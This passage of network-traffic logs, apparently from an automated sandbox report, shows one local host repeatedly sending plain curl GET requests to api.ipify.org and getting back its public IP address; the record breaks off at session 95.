                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c489af7317f3-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  57192.168.11.2049838104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:27.018948078 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:27.165925026 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:27 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c48f3fc253b7-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  58192.168.11.2049839104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:27.800020933 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:27.947069883 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:27 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4942f7d6734-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  59192.168.11.2049840104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:28.612220049 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:28.759952068 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:28 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c49939a04520-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  60192.168.11.2049841104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:29.377769947 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:29.521014929 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:29 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c49dfb83bf93-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  61192.168.11.2049842104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:30.159081936 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:30.306039095 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:30 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4a2daa2b03f-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  62192.168.11.2049843104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:30.924253941 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:31.068043947 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:31 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4a7afacb062-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  63192.168.11.2049844104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:31.736623049 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:31.880978107 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:31 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4acbf45071f-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  64192.168.11.2049845104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:32.501998901 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:32.646878004 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:32 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4b18ef1bfd1-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  65192.168.11.2049846104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:33.267865896 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:33.412353992 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:33 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4b64cc212ee-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  66192.168.11.2049847104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:34.126698971 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:34.270359993 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:34 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4bbab42ad9a-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  67192.168.11.2049848104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:34.923389912 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:35.070672035 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:35 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4c0a9a778c8-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  68192.168.11.2049849104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:35.728552103 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:35.873290062 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:35 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4c5ab8ead80-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  69192.168.11.2049850104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:36.579245090 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:36.723126888 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:36 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4cafe9353aa-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  70192.168.11.2049851104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:37.360606909 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:37.504977942 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:37 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4cfea4dbd2a-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  71192.168.11.2049852104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:38.110241890 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:38.256477118 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:38 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4d4999bbfd3-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  72192.168.11.2049853104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:38.906891108 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:39.054780006 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:38 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4d98fb112e1-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  73192.168.11.2049854104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:39.687999964 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:39.831537962 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:39 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4de6e847b93-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  74192.168.11.2049855104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:40.479274988 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:40.623925924 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:40 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4e35d8abcdd-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  75192.168.11.2049856104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:41.250272989 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:41.397977114 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:41 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4e839e9bfef-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  76192.168.11.2049857104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:42.015530109 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:42.162081003 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:42 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4ecffde07ba-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  77192.168.11.2049858104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:42.843513012 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:42.995326042 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:42 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4f22b4f7bba-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  78192.168.11.2049859104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:43.608993053 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:43.755762100 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:43 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4f6ecbcbfa3-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  79192.168.11.2049860104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:44.390099049 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:44.540314913 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:44 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c4fbdbaa136d-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  80192.168.11.2049861104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:45.280777931 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:45.425302982 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:45 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5016d04452c-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  81192.168.11.2049862104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:46.045963049 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:46.194169998 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:46 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5062b1b451b-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  82192.168.11.2049863104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:46.826982021 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:46.971803904 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:46 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c50b0e76678d-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  83192.168.11.2049864104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:47.670689106 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:47.814590931 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:47 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5105c1abcc5-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  84192.168.11.2049865104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:48.435966969 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:48.579864025 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:48 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5151a6512ea-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  85192.168.11.2049866104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:49.185817003 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:49.330105066 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:49 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c519c9a51d72-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  86192.168.11.2049867104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:50.045108080 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:50.190115929 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:50 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c51f2cd0b03f-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  87192.168.11.2049868104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:50.841828108 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:50.989255905 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:50 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5242cd46737-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  88192.168.11.2049869104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:51.607201099 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:51.756989956 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:51 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c528ed50676a-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  89192.168.11.2049870104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:52.388310909 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:52.532260895 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:52 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c52dcd7ebd4d-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  90192.168.11.2049871104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:53.153753996 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:53.304339886 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:53 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5329a58bd58-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  91192.168.11.2049872104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:53.919186115 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:54.062747955 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:54 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5375e22c022-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  92192.168.11.2049873104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:54.747139931 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:54.892359018 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:54 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c53c8933458e-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  93192.168.11.2049874104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:55.559417009 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:55.703619957 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:55 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5419ef38832-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  94192.168.11.2049875104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:56.340681076 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:56.489437103 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:56 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5468b49453b-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  95192.168.11.2049876104.26.13.20580
                                  TimestampBytes transferredDirectionData
